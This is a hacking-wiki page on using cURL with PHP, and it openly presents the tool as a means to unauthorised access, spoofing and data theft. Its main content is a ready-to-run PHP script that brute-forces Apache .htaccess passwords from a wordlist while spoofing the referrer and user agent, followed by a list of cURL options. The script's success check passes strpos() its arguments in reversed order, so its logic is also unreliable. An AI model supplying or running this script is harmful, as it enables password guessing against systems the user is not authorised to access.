CURL

From Hakipedia

Jump to: navigation, search

Contents

[edit] cURL

cURL aka Client URL, a library created by Daniel Stenberg,is a predominantly command line based tool, which can be used to force parameters into a web request. The cURL library was ported to PHP as an optional module and can be useful when attempting to gain reconnaissance information, or unauthorised access to a designated URL.

[edit] cURL and PHP

PHP supports libcurl which currently supports the http, https, ftp, gopher, telnet, dict, file, and ldap protocols. libcurl also supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading (this can also be done with PHP's ftp extension), HTTP form based upload, proxies, cookies, and user+password authentication. cURL can be used in conjunction with PHP scripts for bruteforce attacks (including SQL injection table brute forcing), reconnaissance attacks, spoofing, and data theft.

[edit] cURL Brute Force Script

The following cURL script can be used to brute force Apache .htaccess authentication: 

<?php
$ref = "http://www.example.com/index.php";      // Set the referrer to spoof
 
$denied = "Forbidden";                          // Set the "Denied" output
 
$wordlist = "/var/www/wordlist.txt";            // Set the wordlist location
 
set_time_limit( 0 );                            // Set script execution limit. 0 = no limit
 
$ch = curl_init( );                             // Initialise cURL
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1);   // Set RETURNTRANSFER to TRUE
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, 1);   // Set FOLLOWLOCATION to TRUE
curl_setopt( $ch, CURLOPT_REFERER, $ref);        // Set REFERER to $ref
curl_setopt( $ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); // Spoof User Agent
 
foreach( file( $wordlist ) as $password )       // Start the loop for dictionary attack
{
    $force = "http://admin:{$password}@www.example.com/admin/"; // Set the URL to attack,
    curl_setopt( $ch, CURLOPT_URL, $force );      // Load the URL to attack with cURL
    $check = curl_exec( $ch );                  // Set params to check
    if( !strpos( $denied, $check ) )             // Check to see if $denied is not in page
    {
        die( "Success! The password is: {$password}" ); // If $denied returns false, success
    }
}
curl_close( $ch );                              // Close the cURL process
?>

[edit] Useful PHP cURL Options

CURLOPT_FOLLOWLOCATION

  • TRUE to follow any "Location: " header that the server sends as part of the HTTP header (note this is recursive, PHP will follow as many "Location: " headers that it is sent, unless CURLOPT_MAXREDIRS is set).

CURLOPT_POST

  • CURLOPT_POSTFIELDS

CURLOPT_COOKIE

  • The contents of the "Set-Cookie: " header to be used in the HTTP request.

CURLOPT_COOKIEFILE

  • The name of the file containing the cookie data. The cookie file can be in Netscape format, or just plain HTTP-style headers dumped into a file.

CURLOPT_COOKIEJAR

  • The name of a file to save all internal cookies to when the connection closes.

Refer to http://us3.php.net/manual/en/function.curl-setopt.php for more documentation on the parameters that can be set.

Retrieved from "http://www.hakipedia.com/index.php/CURL"
Personal tools
social bookmarking




affiliates

Enigma Group